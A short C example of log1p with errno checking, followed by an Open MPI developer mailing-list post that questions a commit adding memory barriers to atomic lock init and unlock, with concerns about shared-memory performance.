    reinspection_date = survey_date + datetime.timedelta(days=365)
    return datetime.datetime.strftime(reinspection_date, date_str_format)

That last line is formatting the datetime object back to a string-formatted date to exclude the time portion (which defaults to midnight). You can leave that part out if you don't mind your dates all having the time displayed (even though they do have it hidden); just return reinspection_date. And this for the Python expression:

calc_reinspection(!SurveyDate!)

Hi Blake - Thank you for your response. I am now trying to add in the risk zones and my statement does not seem to be working.

Field Calculator:
Expression line: reclass(!SurveyDate!)
Code block:

def reclass(SurveyDate):
    if (RiskZone = LOW):
        return "SurveyDate + datetime.timedelta(days=486)"
    elif (RiskZone = MED):
        return return "SurveyDate + datetime.timedelta(days=1095)"
    elif (RiskZone = HIGH):
        return return "SurveyDate + datetime.timedelta(days=1825)"

Attached is the syntax error. Any assistance is appreciated. Thank you

That error is because you are using a single = which is for assignment. Use double == for comparing equality. And you probably want quotes around the LOW value to indicate it's a string and not a variable that isn't defined:

if (RiskZone == "LOW"):

Also, get rid of the double return keywords; just one will do 😉

Thank you 😊
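A closing note for readers landing here later: the thread never shows the fully corrected code block, so below is a minimal sketch combining the fixes discussed above. The field names (SurveyDate, RiskZone), the date format, and the mapping of 1, 3, and 5 years to the high, medium, and low zones are assumptions carried over from the original question; adjust them to your own schema.

import datetime

def calc_reinspection(survey_date, risk_zone):
    date_str_format = "%d/%m/%Y"
    # Intervals follow the stated requirement: 1 year for HIGH,
    # 3 years for MED, 5 years for LOW risk zones.
    days_by_zone = {"HIGH": 365, "MED": 1095, "LOW": 1825}
    d = datetime.datetime.strptime(survey_date, date_str_format)
    reinspection = d + datetime.timedelta(days=days_by_zone[risk_zone])
    return datetime.datetime.strftime(reinspection, date_str_format)

with the expression line: calc_reinspection(!SurveyDate!, !RiskZone!)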
https://community.esri.com/t5/python-questions/automating-date-calculations-in-field-calculator/m-p/1068518
CC-MAIN-2021-31
en
refinedweb
Python Serial Communication
Updated: Apr 16

Learn how to use the open source and free PySerial library to send and receive data from your Python program via Serial communication.

Introduction
Python is a very powerful language because of its ease of use, wide adoption, support community, and increased use in data science and scientific endeavors. So it is a tremendous advantage to be able to unleash the power of Python on our physical devices. In order to do this we need a way of communicating from our Python programs to our microcontrollers -- so we use Serial communication. For a walkthrough on how to communicate via Serial line from the language Processing, see the Serial Communication with Processing Tutorial. This tutorial will show examples of how to send and receive data from Python over the serial port. We will be sending actual string literals, as well as variables (more useful).

Parts List
Arduino UNO (1)
Anaconda Installation with Python 3.8
LED (1)
330 Ohm Resistor (1)
Jumper Cables (assorted)

The Project
We are going to run Python on our computer and send numerical data to our Arduino to control the brightness of an LED.

Physical Interface
The Arduino circuit is shown to the left. This circuit is very simple because the purpose of this tutorial is just to demonstrate basic Serial communication with the use of an LED. Below is the Fritzing breadboard diagram. Overall it's pretty self-explanatory, except that the single resistor used was 330 ohms.

This is the code to execute in the Arduino IDE:

const int analogOutPin = 9;
int ledBrightness = 0;

void setup() {
  // initialize serial communications at 9600 bps:
  Serial.begin(9600);
}

void loop() {
  // Update brightness of LED
  analogWrite(analogOutPin, ledBrightness);
  delay(2);
  // Read data from Serial line
  if (Serial.available() > 0) {
    ledBrightness = Serial.parseInt();
  }
}

Python Interface
1. First we need to install and import the PySerial library:

conda install pyserial

import serial

2. Initialize the port for serial communication:

ComPort = serial.Serial('COM4')  # open COM4
ComPort.baudrate = 9600          # set Baud rate to 9600

The value of the port may be different for you; it must be changed to the name of the port you are using in your Arduino sketch (i.e. 'COM3', 'COM5', etc.). Here is how to figure out the port for your Arduino: AFTER the Arduino is already connected to your computer, go to the Tools menu and see which port is specified. In the image to the left we can see "COM4 (Arduino Uno)", which means we need to communicate with "COM4".

3. Here is an example of sending a string literal via Serial line:

ComPort.write(b'100')

In the above we are specifying that the value is being sent as bytes, as denoted by the prefix b. After executing this line of code along with your Arduino circuit hooked up, you should now see that the LED has turned on, and it has been set to a brightness of 100 out of 255. (Before/after photos in the original post.)

4. Here is an example of sending a value by variable over the Serial line. This will cause the LED connected to the Arduino to be set to a random brightness, which is stored in the variable s and then used in ComPort.write(s).

import random
s = str(random.randrange(50,100)).encode()
ComPort.write(s)

In the above code we are doing the following: Encode the random value as a string, s. Write the value of s via Serial line.
After executing these lines of code along with your Arduino circuit hooked up, you should see a different brightness each time you run the command. The original post closes with a screenshot of the complete Jupyter notebook containing all of the commands above, in order, so you can follow through with the examples.
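As a wrap-up that is not in the original post, here is a minimal end-to-end sketch of the host-side script. It assumes the Arduino sketch above is already running and that 'COM4' is the port shown in the Arduino IDE; it only uses the PySerial calls introduced in this tutorial.

import random
import time
import serial

ComPort = serial.Serial('COM4')  # use the port from the Arduino IDE's Tools menu
ComPort.baudrate = 9600          # must match Serial.begin(9600) in the sketch

try:
    for _ in range(10):
        brightness = random.randrange(0, 256)    # full 0-255 PWM range
        ComPort.write(str(brightness).encode())  # ASCII digits for Serial.parseInt()
        time.sleep(1.0)                          # hold each brightness level briefly
finally:
    ComPort.close()                              # release the port when done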
https://www.codeiseverywhere.com/post/python-serial-communication
CC-MAIN-2021-31
en
refinedweb
# Am trying to create an intelligent model and from there am trying to predict the system......

import pandas as pd            # custom data
from sklearn import neighbors  # to implement the algorithm
import numpy as np             # numerical processing
%matplotlib inline
import seaborn                 # charting

df = pd.DataFrame({"Data_Value_1": [0.6], "Data_Value_2": [0.5]})
xtest = df.to_numpy()

# Create a dataframe with x and y values and a reference column... 3 columns of data...
kmeans_Data = pd.DataFrame()
kmeans_Data["Data_Value_1"] = [0.3051, 0.4949, 0.6974, 0.3769, 0.2231, 0.341, 0.4436, 0.5897, 0.6308, 0.5]
kmeans_Data["Data_Value_2"] = [0.5846, 0.2654, 0.2615, 0.4538, 0.4615, 0.8308, 0.4962, 0.3269, 0.5346, 0.6731]
kmeans_Data["Final_Outcome"] = ["win", "win", "win", "win", "win", "loss", "loss", "loss", "loss", "loss"]
kmeans_Data

seaborn.lmplot('Data_Value_1', 'Data_Value_2', data=kmeans_Data, hue="Final_Outcome")

# To do processing, we need to convert into numpy arrays...
X = kmeans_Data[["Data_Value_1", "Data_Value_2"]].to_numpy()  # two-dimensional array (a matrix)
y = np.array(kmeans_Data["Final_Outcome"])                    # one-dimensional array

# Created the classifier... (despite the "Kmeans" naming, this is a
# k-nearest-neighbours classifier with k=3)
KmeansClassifier = neighbors.KNeighborsClassifier(3, weights='uniform')
KmeansClassifier

# Create the model by fitting the classifier and the data
# (the original used two different names for this object; unified here
# so the predict calls below actually run)
Kmeans_trained_model = KmeansClassifier.fit(X, y)
Kmeans_trained_model.score(X, y)

# We successfully created the model... its time for us to step ahead with the testing part...
# R u ready... my robot is created with all the validated data... i need to test my robot
# whether it is giving output if i give some values to it... Lets move on...
test_value = np.array([[0.6, 0.4]])

# looks like the value is a loss... lets see whether we are getting the same result...
x_test = np.array([[.5, .6]])
Kmeans_trained_model.predict(x_test)
Kmeans_trained_model.predict_proba(x_test)
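A small follow-up that is not in the original snippet: the xtest array built from the one-row DataFrame at the top is never actually used afterwards. Feeding it through the fitted model (names exactly as defined above) closes that loop:

# Predict for the point (0.6, 0.5) that was wrapped in a DataFrame at the top
print(Kmeans_trained_model.predict(xtest))        # expected: ['loss'] (its 3 nearest points are all "loss")
print(Kmeans_trained_model.predict_proba(xtest))  # class probabilities, ordered as ['loss', 'win']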
https://www.kaashivinfotech.com/gffdtqweettihbvaewrdygjbvhvghf/
CC-MAIN-2021-31
en
refinedweb
On Tue, 16 Jul 1996, root wrote:
> Hello.
> I have a question about the stddef.h file in the
> ./include/linux directory of v2 kernel, linked to
> /usr/include/stddef.h. Since v2.0.0, I have had to make the
> following patch to the file or the kernel would not compile,
> noting several problems with using wchar_t definitions in the
> /usr/include/stdlib.h file. My most recent kernel with this
> Am I doing something wrong or is something just messed up??

I have a similar problem here and posted something on this about 2 weeks ago. The kernel compiles without problems. But other programs sometimes need some help with stddef.h !

>
> This is the patch I use: diff -u stddef.h stddef.h.sav
> --- stddef.h Wed Dec 1 07:44:15 1993
> +++ stddef.h.sav Sun Jul 7 01:07:57 1996
> @@ -6,6 +6,16 @@
>  typedef unsigned int size_t;
>  #endif
>
> +/*
> +#ifdef wchar_t
> +#undef wchar_t
> +#endif
> +*/
> +
> +#ifndef _WCHAR_T
> +typedef unsigned long wchar_t;
> +#endif /* _WCHAR_T */
> +
>  #undef NULL
>  #define NULL ((void *)0)
> [big snip]

- Sebastian Benoit                  Save the planet !
- [email protected] [email protected]   less is more !
https://lkml.org/lkml/1996/7/17/16
CC-MAIN-2021-31
en
refinedweb
AWS Security Blog

How to Receive Alerts When Your IAM Configuration Changes

AWS CloudTrail, Amazon CloudWatch Logs, Amazon CloudWatch, and Amazon SNS will help make sure no changes to your AWS Identity and Access Management (IAM) configuration are made without you being alerted. In this blog post, we walk through how to set up CloudWatch alarms on IAM configuration changes.

Before getting started, make sure you have done the following:

- You must have CloudTrail turned on in each of your regions. CloudTrail creates a record of what's happening in your account and is an essential part of securing your account.
- You must already have an SNS topic configured to receive CloudWatch alarms. Refer to the topic by its Amazon Resource Name (ARN) (for example, arn:aws:sns:us-east-1:012345678912:emailalerts). A list of your topics and their ARNs is available from the SNS console.
- CloudTrail must have access to an IAM role in your account to be able to send CloudTrail events to your CloudWatch Logs. Make sure you note the log group to which your CloudTrail events are being sent. The default log group is "CloudTrail/DefaultLogGroup."

Here's a quick overview of how AWS usage ends up triggering a CloudWatch alarm. The users of your AWS account make calls to IAM (and other AWS services), and a record of these calls is included in your CloudTrail logs (these records are called "events"). CloudTrail then assumes the IAM role you created (see #3 above), which allows CloudTrail to publish events to your CloudWatch Logs. CloudWatch allows you to run a filter on these events and generate a CloudWatch metric on any matches. It's up to you to define when these metrics trigger an alarm, but when enough events occur in a specified time period, you will receive an alert either via an SNS topic or email. The following diagram illustrates the process:

Use CloudWatch filter patterns

Before you configure an alarm, you have to decide what will trigger the alarm. This section includes three filter patterns and explains the IAM use cases to which they apply. More filter patterns—for example, for console sign-in failures, network access control list (ACL) changes, and security group configuration changes—are available in the CloudWatch documentation.

Monitor all calls to IAM

To monitor all calls to IAM, you can use the following CloudWatch filter pattern:

{ ($.eventSource = "iam.amazonaws.com") }

This filter pattern matches any CloudTrail events for calls to the IAM service. All calls to IAM have a CloudTrail eventSource of iam.amazonaws.com, so any IAM API calls will match this pattern. You will find this simple filter pattern useful if you have minimal IAM activity in your account or to test this blog post.

Important: The blank spaces in filter patterns are for clarity. Also, note the use of outer curly brackets and inner parentheses.
Monitor changes to IAM

If you are interested only in changes to your IAM account, use the following filter pattern:

{ ( ($.eventSource = "iam.amazonaws.com") &&
  (($.eventName = "Add*") || ($.eventName = "Attach*") || ($.eventName = "Change*") ||
   ($.eventName = "Create*") || ($.eventName = "Deactivate*") || ($.eventName = "Delete*") ||
   ($.eventName = "Detach*") || ($.eventName = "Enable*") || ($.eventName = "Put*") ||
   ($.eventName = "Remove*") || ($.eventName = "Set*") || ($.eventName = "Update*") ||
   ($.eventName = "Upload*")) ) }

This filter pattern will only match events from the IAM service whose names begin with "Add," "Attach," "Change," "Create," "Deactivate," "Delete," "Detach," "Enable," "Put," "Remove," "Set," "Update," or "Upload." For more information about why we're interested in APIs matching these patterns, see the IAM API Reference.

Monitor changes to authentication and authorization configuration

If you're interested in changes to your AWS authentication (security credentials) and authorization (policy) configuration, use the following filter pattern:

{ ( ($.eventSource = "iam.amazonaws.com") &&
  (($.eventName = "Put*Policy") || ($.eventName = "Attach*") || ($.eventName = "Detach*") ||
   ($.eventName = "Create*") || ($.eventName = "Update*") || ($.eventName = "Upload*") ||
   ($.eventName = "Delete*") || ($.eventName = "Remove*") || ($.eventName = "Set*")) ) }

This filter pattern matches calls to IAM that modify policy or create, update, upload, and delete IAM elements.

Create a CloudWatch metric based on IAM API activity

Now, we can set up a CloudWatch metric based on the configuration changes we wish to monitor, and then build a CloudWatch alarm based on that metric:

- In the CloudWatch console, click Logs and then select the check box for your CloudTrail log group. (If you are unclear, review your configuration for prerequisite #3 at the beginning of this blog post.)
- Click Create Metric Filter.
- On the Define Logs Metric Filter screen, click Filter Pattern and enter one of the filter patterns shown above.
- Click Test Pattern to see how many of your CloudTrail events will be matched, and then click Show test results to see which events matched. If you've only recently enabled your CloudTrail events or you don't have recent IAM activity, the events may not be available for a few minutes.
- When your pattern meets your requirements, click Assign Metric. On the Create Metric Filter and Assign a Metric screen, in the Filter Name box, type a name for the filter, such as IAMAuthnAuthzActivity.
- Under Metric Details, in the Metric Namespace box, type a namespace, such as CloudTrailMetrics.
- In the Metric Name box, type a name for the metric, such as IAMAuthnAuthzActivity.
- Click Show advanced metric settings.
- Click Metric Value, and then type 1. This means that each CloudTrail event that matches this filter will contribute a metric of one unit. This is important for configuring the alarm later.
- Click Create Filter.

The following image shows what the metric configuration looks like in the CloudWatch console for the "Monitor changes to authentication and authorization configuration" filter pattern mentioned previously in this post:

Create a CloudWatch alarm for IAM changes

After you complete the previous steps, you should see your newly created CloudWatch metric (in our example, we've used IAMAuthnAuthzActivity).
You can now treat this as any other CloudWatch alarm, so follow these steps to receive a notification when IAM changes are made:

- Select Create Alarm (if you are proceeding directly from the previous procedure), or select your newly created metric, and then click Next in the Create Alarm interface.
- Give the alarm a name such as IAMAuthnAuthzActivityAlarm.
- Set the alarm to trigger when your metric is >= 1 for 1 consecutive period.
- Select your notification channel, configured in prerequisite #2 at the beginning of this blog post.
- Set the period to 5 Minutes and the statistic to Sum.

The following screen shot shows how the alarm appears in the CloudWatch console:

Sample alarm

When the alarm is triggered, you'll see an SNS message or email with the following details:

Alarm Details:
- Name: IAMAuthnAuthzActivityAlarm
- State Change: INSUFFICIENT_DATA -> ALARM
- Reason for State Change: Threshold Crossed: 1 datapoint (1.0) was greater than or equal to the threshold (1.0).
- Timestamp: Monday 26 January, 2015 21:50:52 UTC
- AWS Account: 123456789012

Threshold:
- The alarm is in the ALARM state when the metric is GreaterThanOrEqualToThreshold 1.0 for 300 seconds.

This is your cue to review your CloudTrail logs and figure out who made changes to your account. Ideally, all unexpected changes could be prevented, but monitoring IAM security configuration changes allows you another layer of defense against the unexpected. Create an alarm for IAM events that are important to you, and have a response plan ready for such unexpected situations.

If you have questions or feedback about this or any other IAM topic, please visit the IAM forum.

– Will
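The console steps above can also be scripted. The following is a hedged sketch using boto3 and is not part of the original post; the log group name, metric names, and topic ARN simply reuse the examples from this article, so substitute your own values.

import boto3

logs = boto3.client('logs')
cloudwatch = boto3.client('cloudwatch')

# Metric filter equivalent to the "Monitor all calls to IAM" pattern
logs.put_metric_filter(
    logGroupName='CloudTrail/DefaultLogGroup',
    filterName='IAMAuthnAuthzActivity',
    filterPattern='{ ($.eventSource = "iam.amazonaws.com") }',
    metricTransformations=[{
        'metricName': 'IAMAuthnAuthzActivity',
        'metricNamespace': 'CloudTrailMetrics',
        'metricValue': '1',   # each matching event contributes one unit
    }],
)

# Alarm equivalent to the console steps: Sum >= 1 over one 5-minute period
cloudwatch.put_metric_alarm(
    AlarmName='IAMAuthnAuthzActivityAlarm',
    Namespace='CloudTrailMetrics',
    MetricName='IAMAuthnAuthzActivity',
    Statistic='Sum',
    Period=300,
    EvaluationPeriods=1,
    Threshold=1,
    ComparisonOperator='GreaterThanOrEqualToThreshold',
    AlarmActions=['arn:aws:sns:us-east-1:012345678912:emailalerts'],
)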
https://aws.amazon.com/blogs/security/how-to-receive-alerts-when-your-iam-configuration-changes/
CC-MAIN-2021-31
en
refinedweb
Multiplies two vectors component-wise.

Every component in the result is a component of a multiplied by the same component of b.

// Calculate the two vectors generating a result.
// This will compute Vector3(2, 6, 12)
using UnityEngine;
using System.Collections;

public class ExampleClass : MonoBehaviour {
    void Example() {
        print(Vector3.Scale(new Vector3(1, 2, 3), new Vector3(2, 3, 4)));
    }
}

The instance form, Scale(scale), multiplies every component of this vector by the same component of scale.
https://docs.unity3d.com/kr/2018.2/ScriptReference/Vector3.Scale.html
CC-MAIN-2021-31
en
refinedweb
In this article, we will learn about a very important topic: Django Template Inheritance. We've already learned what templates in Django are. We'll carry our knowledge from there and build up on it.

What is Django Template Inheritance?

Template Inheritance is a method to add all the elements of an HTML file into another without copy-pasting the entire code. For example, consider the Facebook homepage. The underlying theme of the web page (background, elements, etc.) is the same for all FB endpoints. There are two ways to achieve this:

- Add the same CSS/JS/HTML code to all the Endpoint Templates
- Or, create a single file containing all common elements and then simply include it in others.

The second method is exactly what Template Inheritance does.

Why Inheritance?

Just like Facebook, most applications have long HTML code even for a single page. Writing all that again and again for every page is impractical and very inefficient. Thus Django provides the method of Template Inheritance to ensure more efficiency and less repetition of code.

Another significant benefit of Template Inheritance is that if we modify the main file, it automatically gets changed at all places where it was inherited. Thus we don't need to modify it at all other places.

Hands-on with Django Template Inheritance

Let us create a base HTML file at the project level and then have the Django App templates inherit it.

1) Modify TEMPLATES in settings.py

To make the base file accessible, add the following line into TEMPLATES in settings.py as shown in the screenshot below.

'DIRS': [os.path.join(BASE_DIR,'django_project/templates')],

This line does the following:

- We get the path of the Django project directory using the predefined variable BASE_DIR (our Django project folder)
- Then, with the os module, we join it to the django_project/templates folder.

We are basically telling Django to search for templates outside the app, at the project level (the path indicated by the above code), as well.

2) Coding the Parent Base HTML file

Create a template base.html in the templates folder present at the Django project directory level, outside all the apps, and add the following code into the file:

<h2>Basic File Inheritance</h2>
{% block <block_name> %}
    <p>PlaceHolder to be Replaced</p>
{% endblock %}

3) Coding the Child App Template

Create a template AppTemplate.html inside your app's templates folder:

{% extends 'base.html' %}
{% block content %}
    <h3>Welcome to the App</h3><br>
{% endblock %}

Note: The {% extends 'base.html' %} line should always be present at the top of the file. We need to add the template content in a similar block with the same name as in the parent file. The content of the blocks in the base file will be replaced with the corresponding block contents of this file.

4) Creating an App View to display the Template

We now just need a View to render and display our App Template. The code for the View will be simply:

from django.shortcuts import render

def TemplateView(request):
    return render(request, '<app_name>/AppTemplate.html')  # path to the Template

The URL path for the view:

path('template/', TemplateView)

Implementing Template Inheritance

That's all with the coding part; let us now see the Templates in the browser. Run the server and hit the /template/ URL.

You can now continue to create pages with formatting that's similar to the main template. In our case, that's base.html. If you add the required CSS and HTML formatting options to base.html, the same styles will be applied to all templates that inherit the base file.

Conclusion

That's it with the Template Inheritance!!
See you in the next article!! Till then keep practicing !!
https://www.askpython.com/django/django-template-inheritance
CC-MAIN-2021-31
en
refinedweb
Description

Sukhoi alternatives and similar packages, based on the "Web Crawling" category:

- Scrapy - Scrapy, a fast high-level web crawling & scraping framework for Python.
- pyspider - A Powerful Spider (Web Crawler) System in Python.
- requests-html - Pythonic HTML Parsing for Humans™
- portia - Visual scraping for Scrapy
- MechanicalSoup - A Python library for automating interaction with websites.
- RoboBrowser - A simple, Pythonic library for browsing the web without a standalone web browser.
- cola - A high-level distributed crawling framework.
- PSpider - 简单易用的Python爬虫框架,QQ交流群:597510560
- Grab - Web Scraping Framework
- Scrapely - A pure-python HTML screen-scraping library
- gain - Web crawling framework based on asyncio.
- feedparser - Parse feeds in Python
- MSpider - Spider
- spidy Web Crawler - The simple, easy to use command line web crawler.
- Crawley - Pythonic Crawling / Scraping Framework based on Non Blocking I/O operations.
- brownant - Brownant is a web data extracting framework.
- Google Search Results in Python - Google Search Results via SERP API pip Python Package
- Demiurge - PyQuery-based scraping micro-framework.
- reader - A Python feed reader library.
- Pomp - Screen scraping and web crawling framework
- FastImage - Python library that finds the size / type of an image given its URI by fetching as little as needed
- Mariner

README

Features

- Http/https Support
- Short learning curve
- GET/POST Requests
- Basic AUTH support
- Modular
- Support for LXML
- Support for BeautifulSoup4
- Non-blocking I/O
- Retry Mechanism

Basic example

The basic example below is equivalent to scrapy's main example, although it scrapes not only the author's name but the complete description that sits one layer down from the quotes pages. Miners inherit from Python's list class, so they can be used to accumulate data from the pages, and they can be placed anywhere too (in this way it is highly flexible for constructing JSON structures from your fetched data).

from sukhoi import MinerLXML, core

class AuthorMiner(MinerLXML):
    def run(self, dom):
        # The dom object is a struct returned by fromstring.
        # from lxml.html import fromstring
        # dom = fromstring(data)
        # See:
        # Grab the text for the author description
        # and accumulate it.
        elems = dom.xpath("//div[@class='author-description']")
        self.append(elems[0].text)

class QuoteMiner(MinerLXML):
    def run(self, dom):
        # Grab all the quotes.
        elems = dom.xpath("//div[@class='quote']")
        self.extend(list(map(self.extract_quote, elems)))

        # Grab the link that points to the next page.
        next_page = dom.xpath("//li[@class='next']/a[@href][1]")

        # If there is a next page then flies there to extract
        # the quotes.
        if next_page:
            self.next(next_page[0].get('href'))

    def extract_quote(self, elem):
        # Grab the quote text.
        quote = elem.xpath(".//span[@class='text']")[0].text
        # Grab the url description.
        author_url = elem.xpath(".//a[@href][1]")[0].get('href')

        # Return the desired structure, and tells AuthorMiner to fly
        # to the url that contains the author description.
        return {'quote': quote, 'author': AuthorMiner(self.geturl(author_url))}

if __name__ == '__main__':
    URL = ''
    quotes = QuoteMiner(URL)
    core.gear.mainloop()

    # As miners inherit from lists, you end up with
    # the desired structure containing the quotes and the
    # author descriptions.
    print(quotes)

The above code would output a JSON structure like:

[{'quote': 'The quote extracted.', 'author': 'The author description from the about link.'}, ...]

Notice the above code differs slightly from scrapy's main example because it catches not just the name of the author but the complete description of the author that's found from the link whose text is "about". You can use either EHP or lxml with sukhoi. Sukhoi permits one to split up the parsing into miners in a succinct way that permits clean and consistent code. Miners can receive pool objects that are used to accurately construct the desired data structure. The example below scrapes all the tags (following pagination), makes sure they are unique, then scrapes all the quotes from them with their author descriptions. It uses EHP to extract the data from the htmls.

from sukhoi import MinerEHP, core

class AuthorMiner(MinerEHP):
    def run(self, dom):
        elem = dom.fst('div', ('class', 'author-description'))
        self.append(elem.text())

class QuoteMiner(MinerEHP):
    def run(self, dom):
        elems = dom.find('div', ('class', 'quote'))
        self.extend(list(map(self.extract_quote, elems)))

        elem = dom.fst('li', ('class', 'next'))
        if elem:
            self.next(elem.fst('a').attr['href'])

    def extract_quote(self, elem):
        quote = elem.fst('span', ('class', 'text'))
        author_url = elem.fst('a').attr['href']
        return {'quote': quote.text(), 'author': AuthorMiner(self.geturl(author_url))}

class TagMiner(MinerEHP):
    acc = set()

    def run(self, dom):
        tags = dom.find('a', ('class', 'tag'))
        self.acc.update([(ind.text(), ind.attr['href']) for ind in tags])

        elem = dom.fst('li', ('class', 'next'))
        if elem:
            self.next(elem.fst('a').attr['href'])
        else:
            self.extract_quotes()

    def extract_quotes(self):
        self.extend([(ind[0], QuoteMiner(self.geturl(ind[1]))) for ind in self.acc])

if __name__ == '__main__':
    URL = ''
    tags = TagMiner(URL)
    core.gear.mainloop()
    print(tags)

The structure would look like:

[(tag_name, {'quote': 'The quote text.', 'author': 'The author description from the about link.'}), ...]

This other example uses beautifulsoup4 to extract merely the quotes. It follows pagination as well.

from sukhoi import MinerBS4, core

class QuoteMiner(MinerBS4):
    def run(self, dom):
        elems = dom.find_all('div', {'class': 'quote'})
        self.extend(list(map(self.extract_quote, elems)))

        elem = dom.find('li', {'class': 'next'})
        if elem:
            self.next(elem.find('a').get('href'))

    def extract_quote(self, elem):
        quote = elem.find('span', {'class': 'text'})
        return quote.text

if __name__ == '__main__':
    URL = ''
    quotes = QuoteMiner(URL)
    core.gear.mainloop()
    print(quotes)

The structure would be:

[quote0, quote1, ...]

Install

Note: Sukhoi works on Python 3 only; Python 2 support was dropped.

pip install -r requirements.txt
pip install sukhoi
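A possible quick-start that is not part of the README: since miners are just lists of plain dicts, strings, and nested miner lists, the scraped structure can be written out as JSON directly. The empty URL mirrors the README examples above; point it at the site you want to crawl, and use any of the miners defined earlier.

import json
from sukhoi import core

if __name__ == '__main__':
    URL = ''                   # fill in the site to crawl, as in the examples above
    quotes = QuoteMiner(URL)   # any of the QuoteMiner classes defined earlier
    core.gear.mainloop()
    # Miners are list subclasses, so the result serializes cleanly.
    print(json.dumps(list(quotes), indent=2))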
https://python.libhunt.com/sukhoi-alternatives
CC-MAIN-2021-31
en
refinedweb
A Gentle Introduction to Dataframes — Part 1 of 3

Becoming a Data Alchemist — Dataframes …Learning My First Trick

Introduction

…the same and/or similar tasks in Python. As I continue to gain proficiency, I am beginning to see the power of Python. Certainly, the learning curve for Python is higher than that of Excel, but as I am discovering, the effort put forth in learning the "Python way" is paying off in creative flexibility. Before I get "too fancy" with my tutorials I am going to start with the basics. As we continue our journey in becoming data alchemists, I will work to ramp up the sophistication of my spells 😊.

In this three-part tutorial, this being part one, I will introduce you to the Dataframe, a central tool in Python, and what I would consider Python's version of the Excel worksheet. I have developed this tutorial as the precursor to parts two and three, which get progressively more technical. Here I introduce you to the "basic" coding required to get to know and clean data using Dataframes. In part two of this tutorial I introduce more "advanced" techniques for summarizing and formatting analysis with Dataframes, and in part three I cover some tips on formatting data using multiple formats in one column. Now let's get started with this tutorial!

What is a DataFrame?

Like the Excel worksheet, the Dataframe is used to view, clean, and transform data into insights. Essentially, think rows and columns, pivot tables, functions, etc.; all of the functionality you would expect in a worksheet is mostly available in Dataframes. However, unlike Excel worksheets, Dataframes are not visible until you load them with data and display them. Below, I will cover this simple step within my first example, but before showing you that code, I want to give you a preview of the tasks I will be covering in this tutorial. I selected some basic transformations that frequently need to be available prior to performing analysis.

Common Data Preparation Tasks

Step 1. Loading Your Data — Using Jupyter Notebook

# Code snippets shown in grey for easy cutting and pasting
import pandas as pd

# read file stored in current working directory, using excel file here
df_BlogMovieData = pd.read_excel('BlogMovieData.xlsx')
df_BlogMovieData

Step 2. Cleaning Up Your Data — Finding Nulls, Understanding Data Types, Changing Data Types, and Formatting Data

- Checking for nulls in our columns:

df_BlogMovieData.isnull().sum()

- Filling blank or null columns with 0:

# Fill nulls with 0
df_BlogMovieData.fillna(0, inplace=True)

- Changing data types if required, and formatting your numbers to improve comprehension:

df_BlogMovieData["Profits"].astype(float)  # (float, int, other)

df_BlogMovieData.head().style.format({'ProductionCost': '${:,.0f}', 'Domestic_Gross': '${:,.0f}',
                                      'Foriegn_Gross': '${:,.0f}', 'Worldwide_Gross': '${:,.0f}',
                                      'Profits': '${:,.0f}'})

Step 3. Making Changes to the Structure of your Dataframes — Delete Columns, Rename Columns, Combining Columns

- Get column names:

df_BlogMovieData.columns

- Drop columns:

df_BlogMovieData.drop('Profits', axis=1, inplace=True)

- Rename columns:

df_BlogMovieData.rename(columns={"studio": "Movie_Studio"}, inplace=True)

- Add columns & combine numbers:

df_BlogMovieData['TotalProfits'] = (df_BlogMovieData['Worldwide_Gross'] - df_BlogMovieData['ProductionCost'])

- Summing a column:

TheTotalProfits = df_BlogMovieData['TotalProfits'].sum()

- Sorting a column:

df_BlogMovieData.sort_values('TotalProfits', ascending=False)

Step 4.
Getting More Advanced — Extracting Data from Dataframe Columns using .apply(Lambda with .split())

Now that you have a sense of the basics, let's look at something a little more advanced but necessary when cleaning data… extracting substrings from larger strings. In Python there are several ways this can be done. Below I have shown an intuitive way for the beginner to perform string extraction. In Excel we use "Left", "Right" or "Mid". In Python it's not quite that simple. In Python we use a combination of the functions ".split()" and ".apply()" and something called "lambda" to access each element in your Dataframe. See the below example showing extracting left, mid, and right using the hypothetical characters "~" & "#" for this example.

- Get left

GetTheLeft = df_BlogMovieData["MovieTitle"].apply(lambda x: x.split('~')[0] if x.find("~") != -1 else None)

# Essentially, .apply() passes in our element, cell by cell. In the lambda we look for "~"; if it is found,
# it splits the string at the "~" and returns a two-part list (locations 0 and 1). x.split('~')[0] is the
# first location and returns the string on the left side, which is passed into our variable.

- Get mid

GetTheMiddle = df_BlogMovieData["MovieTitle"].apply(lambda x: x.split('~')[1].split('#')[0] if x.find("~") != -1 else None)

# Similar to above, except here we check whether a "~" exists in our string; if so, we split at the "~" and,
# instead of grabbing the first location ([0]), we grab the second with [1]. We then split that piece again
# at the "#" and take its first location ([0]), which is then inserted into our variable.

- Get right

GetTheRight = df_BlogMovieData["MovieTitle"].apply(lambda x: x.split('#')[1] if x.find("~") != -1 else None)

# Similar to left above, except we change the character at which we split, and we access the second
# position ([1]) of the returned list instead of the first ([0]) before passing it into our variable.

print(GetTheLeft)
print(GetTheMiddle)
print(GetTheRight)

Summary & Final Note

Above I covered some of the basics of Dataframes. My aim here and beyond is to provide a gentle introduction to Python in a manner that novices can understand. In future blogs we will get more advanced with the material (see "Summarizing data in DataFrames" and "Formatting Frustrations with df.describe()"). I look forward to seeing you in our next adventure in becoming Data Alchemists!

Next Stop — DATA ALCHEMY!
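An aside that is not in the original article: pandas' string accessor can express the same three extractions without an explicit lambda. This is only a sketch reusing the MovieTitle column and the "~"/"#" markers from the examples above; note that rows lacking the markers behave slightly differently here (the left split returns the whole string, and missing pieces come back as NaN instead of None).

# Vectorized equivalents of the three .apply(lambda ...) calls above
GetTheLeft = df_BlogMovieData["MovieTitle"].str.split("~").str[0]
GetTheMiddle = df_BlogMovieData["MovieTitle"].str.split("~").str[1].str.split("#").str[0]
GetTheRight = df_BlogMovieData["MovieTitle"].str.split("#").str[1]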
https://rgpihlstrom.medium.com/becoming-a-data-alchemist-dataframes-85b299609b06
CC-MAIN-2021-31
en
refinedweb
Hello Confluence team,

I installed the update with the installer file, and when opening the web link this error appears. I searched in the atlassian-confluence.log and found this:

2017-11-13 17:01:05,684 INFO [localhost-startStop-1] [confluence.upgrade.impl.DefaultUpgradeManager] beforeUpgrade Finished generating pre-upgrade recovery file.
2017-11-13 17:01:07,314 ERROR [localhost-startStop-1] [atlassian.confluence.plugin.PluginFrameworkContextListener] launchUpgrades Upgrade failed, application will not start: com.atlassian.config.ConfigurationException: Cannot update schema
com.atlassian.confluence.upgrade.UpgradeException: com.atlassian.config.ConfigurationException: Cannot update schema
    at com.atlassian.confluence.upgrade.AbstractUpgradeManager.upgrade(AbstractUpgradeManager.java:135)
    at com.atlassian.confluence.plugin.PluginFrameworkContextListener.launchUpgrades(PluginFrameworkContextListener.java:119)
